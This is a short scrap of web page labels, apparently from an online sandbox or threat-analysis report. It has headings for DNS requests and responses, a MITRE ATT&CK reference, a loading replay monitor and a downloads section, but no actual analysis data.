
DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.